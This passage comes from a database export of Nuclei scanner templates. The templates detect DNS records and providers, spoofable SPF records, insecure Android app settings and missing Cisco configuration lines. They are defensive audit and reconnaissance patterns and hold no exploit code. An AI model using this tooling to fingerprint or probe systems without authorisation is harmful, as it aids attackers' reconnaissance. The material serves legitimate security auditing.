\"Kerio Cloud EU\"\n words:\n - \"mx1.eu1.kerio.cloud\"\n - \"mx2.eu1.kerio.cloud\"\n\n - type: word\n name: \"Kerio Cloud US\"\n words:\n - \"mx1.us1.kerio.cloud\"\n - \"mx2.us1.kerio.cloud\"\n - \"mx3.us1.kerio.cloud\"\n\n - type: word\n name: \"Proofpoint EU\"\n words:\n - \"mx1-eu1.ppe-hosted.com\"\n - \"mx2-eu1.ppe-hosted.com\"\n\n - type: word\n name: \"Proofpoint US\"\n words:\n - \"mx1-us1.ppe-hosted.com\"\n - \"mx2-us1.ppe-hosted.com\"\n\n# digest: 4b0a0048304602210099a2fc7473ed27cd6def422387ade50932830f42a13a93928782b060f911f4bf0221009505a43f95011404d692365315d646406918c54d2829546a2312d4d67440ac0e:922c64590222798bb761d5b6d8e72950\n", "hash": "315dcff2b7d535857de98c98c83683ee", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9d" }, "name": "nameserver-fingerprint.yaml", "content": "id: nameserver-fingerprint\n\ninfo:\n name: NS Record Detection\n author: pdteam\n severity: info\n description: An NS record was detected. An NS record delegates a subdomain to a set of name servers.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,ns\n\ndns:\n - name: \"{{FQDN}}\"\n type: NS\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tNS\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tNS\\t(.+)\"\n\n# digest: 4a0a0047304502201ea440eb1f3de07432e12f94f89b2db94a960b7e41bf0a985db8454471217852022100ea06c3b9f829f1e4cbdd3e2ce32b039e0cf6150525202a42361133fb321794fc:922c64590222798bb761d5b6d8e72950\n", "hash": "d7a80a9f11447f0052e7925497fd5af1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9e" }, "name": "ptr-fingerprint.yaml", "content": "id: ptr-fingerprint\n\ninfo:\n name: PTR Detected\n author: pdteam\n severity: info\n description: A PTR record was detected. A PTR record refers to the domain name.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,ptr\n\ndns:\n - name: \"{{FQDN}}\"\n type: PTR\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tPTR\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tPTR\\t(.+)\"\n\n# digest: 490a00463044022028a8f25e5f2d2d00e9aa403a801265be54f6889185388c416baef105d9b58193022011b971c138e5bf8e83bd52bc68b65f3c7ac9c81a43320629549465a1bc8be1d3:922c64590222798bb761d5b6d8e72950\n", "hash": "5254b2c9272fb4b072d8b77805f7dedc", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9f" }, "name": "servfail-refused-hosts.yaml", "content": "id: servfail-refused-hosts\n\ninfo:\n name: DNS Servfail Host Finder\n author: pdteam\n severity: info\n description: A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary networking issue.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,takeover\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n matchers:\n - type: word\n words:\n - \"SERVFAIL\"\n - \"REFUSED\"\n\n# digest: 4a0a0047304502201e4ab6d52233b5600ef7e9f54060934699002359838bd2802d602b642154ea1402210094809cea67fc9ad6c8a472142c8b3afb960c5e5cb3dfdd6708cb84f411a1790f:922c64590222798bb761d5b6d8e72950\n", "hash": "16f4266a7170c131b1d5a21b51a9df18", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca0" }, "name": "soa-detect.yaml", "content": "id: soa-detect\n\ninfo:\n name: SOA Record Service - Detection\n author: rxerium\n severity: info\n description: |\n Detects which domain provider a domain is using, detected through SOA records\n reference:\n - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/\n metadata:\n verified: true\n max-request: 1\n tags: dns,soa\n\ndns:\n - name: \"{{FQDN}}\"\n\n type: SOA\n\n matchers-condition: or\n matchers:\n - type: word\n name: \"cloudflare\"\n words:\n - \"dns.cloudflare.com\"\n\n - type: word\n name: \"amazon-web-services\"\n words:\n - \"awsdns\"\n\n - type: word\n name: \"akamai\"\n words:\n - \"hostmaster.akamai.com\"\n\n - type: word\n name: \"azure\"\n words:\n - \"azure-dns.com\"\n\n - type: word\n name: \"ns1\"\n words:\n - \"nsone.net\"\n\n - type: word\n name: \"verizon\"\n words:\n - \"verizon.com\"\n\n - type: word\n name: \"google-cloud-platform\"\n words:\n - \"googledomains.com\"\n - \"google.com\"\n\n - type: word\n name: \"alibaba\"\n words:\n - \"alibabadns.com\"\n\n - type: word\n name: \"safeway\"\n words:\n - \"safeway.com\"\n\n - type: word\n name: \"mark-monitor\"\n words:\n - \"markmonitor.com\"\n - \"markmonitor.zone\"\n\n - type: word\n name: \"hetznet\"\n words:\n - \"hetzner.com\"\n\n - type: word\n name: \"edge-cast\"\n words:\n - \"edgecastdns.net\"\n# digest: 4a0a0047304502207543d23b674d6f6af33197f11d534a088adecaa546feb4f674e59c3e17435c14022100ac553ae6b8aa7adc877bf3324accc71ae8801972775c0ed2961e076777d0b66c:922c64590222798bb761d5b6d8e72950", "hash": "1010c2f57d7d53816a790145f4851e37", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca1" }, "name": "spf-record-detect.yaml", "content": "id: spf-record-detect\n\ninfo:\n name: SPF Record - Detection\n author: rxerium\n severity: info\n description: |\n An SPF TXT record was detected\n reference:\n - https://www.mimecast.com/content/how-to-create-an-spf-txt-record\n metadata:\n max-request: 1\n tags: dns,spf\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n matchers:\n - type: word\n words:\n - \"v=spf1\"\n\n extractors:\n - type: regex\n regex:\n - \"v=spf1(.+)\"\n# digest: 4b0a00483046022100e0f6a26cc45857637d83de49ed369272f053c612baef9673f5193256fda98135022100ac6d435df18fdcfdbad52417c38d2dcbff9a58cd2217ba3a66a214fa400ec72b:922c64590222798bb761d5b6d8e72950", "hash": "09caf585594530b9ed9147751fbde9fc", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca2" }, "name": "spoofable-spf-records-ptr.yaml", "content": "id: spoofable-spf-records-ptr\n\ninfo:\n name: Spoofable SPF Records with PTR Mechanism\n author: binaryfigments\n severity: info\n description: SPF records in DNS containing a PTR mechanism are spoofable.\n reference:\n - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,spf\n\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n matchers:\n - type: word\n words:\n - \"v=spf1\"\n - \" ptr \"\n condition: and\n\n# digest: 4a0a00473045022100dcb965b47233e3942f4879e832d145cc6ade3ddc990891e0ff365e8209a6aa8302201ecdb55e85d79a9c4e2d585fd8ce7b83e7549fb3bc257be05038e166b73ec1a6:922c64590222798bb761d5b6d8e72950\n", "hash": "873b15c67321fa1fc3c1248fd8f09e33", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca3" }, "name": "txt-fingerprint.yaml", "content": "id: txt-fingerprint\n\ninfo:\n name: DNS TXT Record Detected\n author: pdteam\n severity: info\n description: A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\n reference:\n - https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,txt\n\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tTXT\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tTXT\\t(.+)\"\n\n# digest: 4b0a00483046022100e4559c121d9f67b4f8ae256bc1310808d8b5223de95617f4043356431e9d65e50221008b74ba8f34d3497f956434868c133d05dfe8408acdcfa3480f7cd64284dee17a:922c64590222798bb761d5b6d8e72950\n", "hash": "2022459dcc9acf1f7fe0cf74ebd779ff", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca4" }, "name": "txt-service-detect.yaml", "content": "id: txt-service-detect\n\ninfo:\n name: DNS TXT Service - Detect\n author: rxerium\n severity: info\n description: |\n Finding the services companies use via their TXT records.\n reference:\n - https://www.abenezer.ca/blog/services-companies-use-txt-records\n metadata:\n verified: true\n max-request: 1\n tags: dns,txt\n\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n\n matchers-condition: or\n matchers:\n - type: word\n name: \"keybase\"\n words:\n - \"keybase-site-verification\"\n\n - type: word\n name: \"proton-mail\"\n words:\n - \"protonmail-verification\"\n\n - type: word\n name: \"webex\"\n words:\n - \"webexdomainverification\"\n\n - type: word\n name: \"apple\"\n words:\n - \"apple-domain-verification\"\n\n - type: word\n name: \"facebook\"\n words:\n - \"facebook-domain-verification\"\n\n - type: word\n name: \"autodesk\"\n words:\n - \"autodesk-domain-verification\"\n\n - type: word\n name: \"stripe\"\n words:\n - \"stripe-verification\"\n\n - type: word\n name: \"atlassian\"\n words:\n - \"atlassian-domain-verification\"\n\n - type: word\n name: \"adobe-sign\"\n words:\n - \"adobe-sign-verification\"\n\n - type: word\n name: \"zoho\"\n words:\n - \"zoho-verification\"\n\n - type: word\n name: \"have-i-been-pwned\"\n words:\n - \"have-i-been-pwned-verification\"\n\n - type: word\n name: \"knowbe4\"\n words:\n - \"knowbe4-site-verification\"\n\n - type: word\n name: \"jamf\"\n words:\n - \"jamf-site-verification\"\n\n - type: word\n name: \"parallels\"\n words:\n - \"parallels-domain-verification\"\n\n - type: word\n name: \"dropbox\"\n words:\n - \"dropbox-domain-verification\"\n\n - type: word\n name: \"vmware-cloud\"\n words:\n - \"vmware-cloud-verification\"\n\n - type: word\n name: \"canva\"\n words:\n - \"canva-site-verification\"\n\n - type: word\n name: \"mongodb\"\n words:\n - \"mongodb-site-verification\"\n\n - type: word\n name: \"slack\"\n words:\n - \"slack-domain-verification\"\n\n - type: word\n name: \"teamViewer\"\n words:\n - \"teamviewer-sso-verification\"\n\n - type: word\n name: \"bugcrowd\"\n words:\n - \"bugcrowd-verification\"\n\n - type: word\n name: \"cisco\"\n words:\n - \"cisco-site-verification\"\n\n - type: word\n name: \"palo-alto-networks\"\n words:\n - \"paloaltonetworks-site-verification\"\n\n - type: word\n name: \"twilio\"\n words:\n - \"twilio-domain-verification\"\n\n - type: word\n name: \"dell-technologies\"\n words:\n - \"dell-technologies-domain-verification\"\n\n - type: word\n name: \"1password\"\n words:\n - \"1password-site-verification\"\n\n - type: word\n name: \"duo\"\n words:\n - \"duo_sso_verification\"\n\n - type: word\n name: \"sophos\"\n words:\n - \"sophos-domain-verification\"\n\n - type: word\n name: \"pinterest\"\n words:\n - \"pinterest-site-verification\"\n\n - type: word\n name: \"citrix\"\n words:\n - \"citrix-verification-code\"\n\n - type: word\n name: \"zapier\"\n words:\n - \"zapier-domain-verification-challenge\"\n\n - type: word\n name: \"uber\"\n words:\n - \"uber-domain-verification\"\n\n - type: word\n name: \"zoom\"\n words:\n - \"zoom-domain-verification\"\n\n - type: word\n name: \"lastpass\"\n words:\n - \"lastpass-verification-code\"\n\n - type: word\n name: \"google-workspace\"\n words:\n - \"google-site-verification\"\n\n - type: word\n name: \"flexera\"\n words:\n - \"flexera-domain-verification\"\n\n - type: word\n name: \"yandex\"\n words:\n - \"yandex-verification\"\n\n - type: word\n name: \"calendly\"\n words:\n - \"calendly-site-verification\"\n\n - type: word\n name: \"docusign\"\n words:\n - \"docusign\"\n\n - type: word\n name: \"whimsical\"\n words:\n - \"whimsical\"\n# digest: 4a0a00473045022100b1a2ab86bb10ef6a55eaa2a6ec8a5adc22a05f003de6e5f6ef884921c4a66e12022054a8c73bec1723fa0637e65cf405f5a5091f6f257d743962dca0691ac639ce2a:922c64590222798bb761d5b6d8e72950", "hash": "ac09fd0634a7cebb2edcd44c101b5304", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca5" }, "name": "worksites-detection.yaml", "content": "id: detect-worksites\n\ninfo:\n name: Worksites.net Service Detection\n author: melbadry9\n severity: info\n description: A worksites.net service was detected.\n reference:\n - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,service\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n matchers:\n - type: word\n words:\n - \"69.164.223.206\"\n\n# digest: 4a0a0047304502205f67d327d32f1d0c1060ed655d0fa32415cd9c82a90d37b6edd56c72c001e3d9022100a3955a69d030743492077d921ae562a00dce69a8def4abad33b18f0a982a8a0e:922c64590222798bb761d5b6d8e72950\n", "hash": "d1a93a6fd86dac6ca2bd884b8b6d2c0f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca6" }, "name": "adb-backup-enabled.yaml", "content": "id: adb-backup-enabled\n\ninfo:\n name: ADB Backup Enabled\n author: gaurang\n severity: low\n description: ADB Backup is enabled, which allows the backup and restore of an app's private data.\n remediation: Ensure proper access or disable completely.\n reference:\n - https://adb-backup.com/\n classification:\n cwe-id: CWE-200\n tags: android,file,adb\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"android:allowBackup=\\\"true\\\"\"\n# digest: 4a0a00473045022100efd6e8093a922583aa94e11240ba3c3fb79aa141ced3c67e7b534b376fc42f45022003b0f537ff8b6454419a0e21321004215151a906dcb13a3144f0514d0a595658:922c64590222798bb761d5b6d8e72950", "hash": "6570d9de26cb87640634be3475201d14", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca7" }, "name": "biometric-detect.yaml", "content": "id: biometric-detect\n\ninfo:\n name: Android Biometric/Fingerprint - Detect\n author: gaurang\n severity: info\n description: Android Biometric/Fingerprint permission files were detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file,biometric\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"android.permission.USE_FINGERPRINT\"\n - \"android.permission.USE_BIOMETRIC\"\n\n# Enhanced by md on 2023/05/02\n# digest: 490a0046304402201effa64fdef8e198849c4be2acf87c6be5c4efed84e9d5bb9d66f5df3db60b5d02200c7003f9a4e737c6fc6cf7137ec2184a7c9f79ed6e3abe97f4c2a02ec90b437e:922c64590222798bb761d5b6d8e72950", "hash": "525acfc0b1d44ecdb39492d05755d68d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca8" }, "name": "certificate-validation.yaml", "content": "id: improper-certificate-validation\n\ninfo:\n name: Android Improper Certificate Validation - Detect\n author: gaurang\n severity: medium\n description: Android improper certificate validation was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/SslErrorHandler;->proceed()V\"\n# digest: 4a0a004730450220641d6e69fc91755ec4dbe940f170858c07c11f7662b3517e5636fc16ee47215e022100de151b50e70241e3c3673f8a482928542ad8791b2b16c54b87b2225ffca7ef5b:922c64590222798bb761d5b6d8e72950", "hash": "9c806f8864b58eb520412bcb1793ff45", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca9" }, "name": "content-scheme.yaml", "content": "id: content-scheme\n\ninfo:\n name: Android Content Scheme - Detect\n author: gaurang\n severity: info\n description: Android content scheme enabling was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - xml\n matchers:\n - type: word\n words:\n - \"android:scheme=\\\"content\\\"\"\n# digest: 4b0a00483046022100c2c3c725fa7b2730a2a97a411041023f26e69c0a799b4e8de850bdac3946b620022100cb36d81a813131983cdce4a0b9ef5eb94c6278ed4c5a9f862bb347fbfad5a0fa:922c64590222798bb761d5b6d8e72950", "hash": "c49dbe38e7545d7f23d4cf881f7dc061", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307caa" }, "name": "debug-enabled.yaml", "content": "id: android-debug-enabled\n\ninfo:\n name: Android Debug Enabled\n author: gaurang\n severity: low\n description: Android debug enabling was detected.\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"android:debuggable=\\\"true\\\"\"\n# digest: 4a0a00473045022036652150abcc863fe683d75f6ef4ed133b21a536c30fa521bccde3e54da770d802210098c054b0d8e64528d1cd18755e42123fc045ca80522a19ba7ee6bbb93d59d817:922c64590222798bb761d5b6d8e72950", "hash": "edf55efb0e1fa80592bfb599d195491a", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cab" }, "name": "deep-link-detect.yaml", "content": "id: deep-link-detect\n\ninfo:\n name: Android Deep Link - Detect\n author: Hardik-Solanki\n severity: info\n description: Android deep link functionality was detected.\n reference:\n - https://developer.android.com/training/app-links/deep-linking\n - https://www.geeksforgeeks.org/deep-linking-in-android-with-example/\n - https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: android,file,deeplink\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"android:scheme\"\n - \"android:host\"\n - \"android:name\"\n condition: and\n\n# Enhanced by md on 2023/05/02\n# digest: 4b0a00483046022100a95d3d2fdeae1df7454ddd0f0ea7f10bbd8edb608c502695f7b6cf66b9415790022100f86fce7ae52479b32a1c4374965476a799a95f8e9fcd0926b35649ba022eacd0:922c64590222798bb761d5b6d8e72950", "hash": "6306c70f8fcb828a9befbe27b3b83d60", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cac" }, "name": "dynamic-broadcast-receiver.yaml", "content": "id: dynamic-registered-broadcast-receiver\n\ninfo:\n name: Android Dynamic Broadcast Receiver Register - Detect\n author: gaurang\n severity: info\n description: Android dynamic broadcast receiver register functionality was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)\"\n# digest: 4a0a00473045022100aa618eba1f07180c9ed91a94c26f3eaa3104134311b4c7c52567ec235f73e01f02204b8920dc1a170a1e7843abc4562c5a453248be604442c0b50ebc0690d1a4c90a:922c64590222798bb761d5b6d8e72950", "hash": "096e3b2d21bb9ec968452c65066e6396", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cad" }, "name": "file-scheme.yaml", "content": "id: file-scheme\n\ninfo:\n name: Android File Scheme - Detect\n author: gaurang\n severity: info\n description: Android file scheme enabling was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - xml\n matchers:\n - type: word\n words:\n - \"android:scheme=\\\"file\\\"\"\n\n# Enhanced by md on 2023/05/03\n# digest: 4b0a00483046022100af4a17caa84888f0caecdc441156d030d844f3839f37936b3d8689a8a7d1aaad0221009c00d9b0ab3ce7efa0ba61485569a0df903a3783c0748289aa4c384ec0896465:922c64590222798bb761d5b6d8e72950", "hash": "4c06c094afea818dcfda3e16ba3e1c8b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cae" }, "name": "google-storage-bucket.yaml", "content": "id: google-storage-bucket\n\ninfo:\n name: Google Storage Bucket - Detection\n author: Thabisocn\n severity: info\n metadata:\n verified: \"true\"\n github-query: \"/[a-z0-9.-]+\\\\.appspot\\\\.com/\"\n tags: file,android,google\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-z0-9.-]+\\\\.appspot\\\\.com\"\n# digest: 4a0a004730450221008d65b2c2642e1ab203ccf7f0a1227352ca7da9f7daf46d085b9dc5ebf0994721022074fba51478f8e72d2bd15ca78b40d7022715cd02124e33a1cf76db1ec0ab838d:922c64590222798bb761d5b6d8e72950", "hash": "57cb9c946f4285951194ae5f27e970c5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307caf" }, "name": "provider-path.yaml", "content": "id: insecure-provider-path\n\ninfo:\n name: Android Insecure Provider Path - Detect\n author: gaurang\n severity: medium\n description: Android insecure provider path was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"root-path name=\\\"[0-9A-Za-z\\\\-_]{1,10}\\\" path=\\\".\\\"\"\n - \"root-path name=\\\"[0-9A-Za-z\\\\-_]{1,10}\\\" path=\\\"\\\"\"\n# digest: 490a0046304402206c94650aa17a95f664a3b02618c0aaf5935a8140b515903041ea94574cf1548d02203fcc98c6c0d286b2ebec48a54955e783d285ca26837e63c869000d48907d03f5:922c64590222798bb761d5b6d8e72950", "hash": "72cb56aada489cae43794c4cd428e594", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb0" }, "name": "webview-addjavascript-interface.yaml", "content": "id: webview-addjavascript-interface\n\ninfo:\n name: Android WebView Add Javascript Interface - Detect\n author: gaurang\n severity: info\n description: Android WebView Add Javascript interface usage was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4a0a00473045022017350c5e7005e173cb17ad1178c2d04297ca669e7911c3aa35ab14e38b4dd63a02210087c5e48401c75a4f6be45c77cdfa376651c0c082a8c204ce021f6fca5c008369:922c64590222798bb761d5b6d8e72950", "hash": "be6e883a6752f1f9d316eb4bb772348d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb1" }, "name": "webview-javascript.yaml", "content": "id: webview-javascript-enabled\n\ninfo:\n name: WebView JavaScript - Detect\n author: gaurang\n severity: info\n description: WebView Javascript enabling was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file,js,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V\"\n# digest: 4a0a00473045022100eeec2d42663cc7c3ba34fa2ae0fba3d4f9e75512967a520a3cd681061476702b02202489b8e69fa532c77c282d7702053492103e9f643863885b397bec5197c7ee6b:922c64590222798bb761d5b6d8e72950", "hash": "4dfd6e13a08507227c4a3503fbbc5af9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb2" }, "name": "webview-load-url.yaml", "content": "id: webview-load-url\n\ninfo:\n name: WebView loadUrl - Detect\n author: gaurang\n severity: info\n description: WebView loadUrl usage was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4b0a00483046022100d61e6bcd00f5e0afaa1969aed4daca70e51186005b245ecb509f3bff3aec9e72022100c0e219ac8ba638bed9f5e01d2f2accf82b2bc8ef612ff3ba220c1f2eeb65dc5e:922c64590222798bb761d5b6d8e72950", "hash": "6e51de7e4e6e3d6315ef0560b0e10264", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb3" }, "name": "webview-universal-access.yaml", "content": "id: webview-universal-access\n\ninfo:\n name: Android WebView Universal Access - Detect\n author: gaurang\n severity: medium\n description: Android WebView Universal Access enabling was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V\"\n# digest: 4a0a00473045022100b3824610ba6b2026b8af411ad1f050590e6d7d443422e6018531dfd6afc4e2c202207791f1506db5b7ed7e28371cc10d6ec040f0e9a60f719c11ef68204c7d53b030:922c64590222798bb761d5b6d8e72950", "hash": "47606a78446cd086fd6aae982be29a05", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb4" }, "name": "configure-aaa-service.yaml", "content": "id: configure-aaa-service\n\ninfo:\n name: Cisco AAA Service Configuration - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco authentication, authorization and accounting service configuration was detected.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"aaa new-model\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4a0a00473045022100b08ae4dfec8550c46d4d2a9947d69c8769894ccaeb677774e12b3c4565fcafb502206a0aff777a79e8632d80b73f9a9329e9b3edd08d8be2d30e3386d89ac9b70f35:922c64590222798bb761d5b6d8e72950", "hash": "a20e500f91646df408eed6f799aaf73f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb5" }, "name": "configure-service-timestamps-debug.yaml", "content": "id: configure-service-timestamps-debug\n\ninfo:\n name: Cisco Configure Service Timestamps for Debug - Detect\n author: pussycat0x\n severity: info\n description: |\n The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently.\n reference:\n - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"service timestamps debug datetime msec show-timezone localtime\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4b0a00483046022100feb39453d1dcb37e56aab12a6aaa9223c2d6c6bf69f6f4562a6240a1ac9f0559022100cf2d34370c98f03d0f9a7ae5d0adfb7ed6afce5f6f9129c2e10df79daf0314b7:922c64590222798bb761d5b6d8e72950", "hash": "486b0e17261d09add8690b17a3365ccd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb6" }, "name": "configure-service-timestamps-logmessages.yaml", "content": "id: configure-service-timestamps-logmessages\n\ninfo:\n name: Cisco Configure Service Timestamps Log Messages - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco service timestamp configuration for log messages was not implemented.\n reference:\n - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"service timestamps log datetime msec show-timezone localtime\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4b0a00483046022100c0cb129cce9ac0411ef5079ca443c0825d38107983ac9adddc1b440fba342b00022100ce2df46bb2f4d0f2ea0ab49d8f2904548be89c8d24e1b5688bdae48942d9aef9:922c64590222798bb761d5b6d8e72950", "hash": 